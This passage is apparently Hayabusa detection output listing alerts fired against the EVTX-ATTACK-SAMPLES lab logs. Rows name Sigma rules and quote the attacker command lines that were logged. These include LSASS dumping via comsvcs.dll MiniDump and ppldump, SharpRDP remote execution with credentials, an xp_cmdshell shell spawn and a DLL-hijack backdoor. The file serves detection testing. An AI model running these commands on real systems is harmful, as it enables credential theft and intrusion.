shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,FromBase64String Command 
Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx +2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx +2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx +2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx +2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx +2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx +2019-08-30 21:54:07.873 
+09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript c:\ProgramData\memdump.vbs notepad.exe : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,high,WScript or CScript Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-09-01 20:54:22.450 +09:00,MSEDGEWIN10,5145,medium,DCERPC SMB Spoolss Named 
Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/spoolsample_5145.evtx +2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-09 04:17:44.249 +09:00,MSEDGEWIN10,13,low,Usage of Sysinternals Tools,,rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx +2019-09-22 20:22:05.201 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3461203602-4096304019-2269080069-501 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx +2019-09-22 20:23:19.251 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: - : SID: S-1-5-20 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx +2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c set > c:\users\\public\netstat.txt : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\sqlsvc : Parent Command: ""c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"" 
-sSQLEXPRESS",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,critical,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation/win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-15 17:19:02.298 +09:00,alice.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx +2019-11-15 17:19:17.134 +09:00,alice.insecurebank.local,4634,informational,Logoff,User: ANONYMOUS LOGON : LogonID: 0x1d12916,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx +2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,FileProtocolHandler ms-browser:// : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:51.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 url.dll,FileProtocolHandler ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:51.122 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,OpenURL ms-browser:// : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.819 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 
url.dll,OpenURL ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /c start ms-browser:// : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c start ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 
+2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: explorer ms-browser:// : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:45.293 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-24 04:09:34.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: SharpRDP.exe computername=192.168.56.1 command=""C:\Temp\file.exe"" username=domain\user password=password : Path: C:\ProgramData\USOShared\SharpRDP.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx +2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: Furutaka.exe dummy2.sys : Path: C:\Users\Public\BYOV\TDL\Furutaka.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 
17:28:12.856 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: ppldump.exe -p lsass.exe -o a.png : Path: C:\Users\Public\BYOV\ZAM64\ppldump.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-03-07 22:17:38.534 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:1 TaskName:\\FullPowersTask timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- +2020-03-07 22:17:39.984 +09:00,MSEDGEWIN10,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx +2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx +2020-03-09 
07:11:34.340 +09:00,MSEDGEWIN10,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx +2020-03-21 14:00:16.296 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: usoclient StartInteractiveScan : Path: C:\Windows\System32\UsoClient.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 
+2020-03-21 14:00:18.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.189 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.195 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : 
Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.221 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session 
Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.421 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : 
User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: nc.exe 127.0.0.1 1337 : Path: C:\Users\Public\Tools\nc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious 